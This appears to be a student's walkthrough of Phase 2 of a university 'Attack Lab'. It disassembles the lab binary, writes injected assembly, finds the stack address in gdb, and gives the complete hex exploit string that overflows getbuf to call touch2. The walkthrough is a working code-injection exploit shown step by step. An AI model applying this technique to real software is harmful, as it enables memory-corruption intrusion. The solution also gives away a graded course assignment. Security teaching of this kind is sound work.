Attack Lab: Phase 2

Run

objdump --disassemble ctarget > ctarget.asm

Read File cookie.txt

0x3a9a6c2f

Read File ctarget.asm

...
0000000000401b28 <getbuf>:
  401b28:	48 83 ec 28          	sub    $0x28,%rsp
...
0000000000401b6a <touch2>:
...

Write File phase-2-inject.s

movl $0x3a9a6c2f, %edi
pushq $0x0000000000401b6a
retq

Run

gcc -c phase-2-inject.s
objdump --disassemble phase-2-inject.o > phase-2-inject.asm

Read File phase-2-inject.asm

...
0000000000000000 <.text>:
   0:	bf 2f 6c 9a 3a       	mov    $0x3a9a6c2f,%edi
   5:	68 6a 1b 40 00       	pushq  $0x401b6a
   a:	c3                   	retq

Run

$ gdb ctarget --tui
...
(gdb) break getbuf
Breakpoint 1 at 0x401b28: file buf.c, line 12.
(gdb) run -q
Starting program: /home/stu2020012872/3-lab-3-attacklab/target97/ctarget -q

Breakpoint 1, getbuf () at buf.c:12
(gdb) stepi
(gdb) info registers rsp
rsp            0x55668c98       0x55668c98

Write File phase-2.txt

bf 2f 6c 9a 3a
68 6a 1b 40 00
c3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
98 8c 66 55 00 00 00 00

Run

./hex2raw < phase-2.txt > phase-2.in
./ctarget -i phase-2.in

Terminal Output

Cookie: 0x3a9a6c2f
Touch2!: You called touch2(0x3a9a6c2f)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!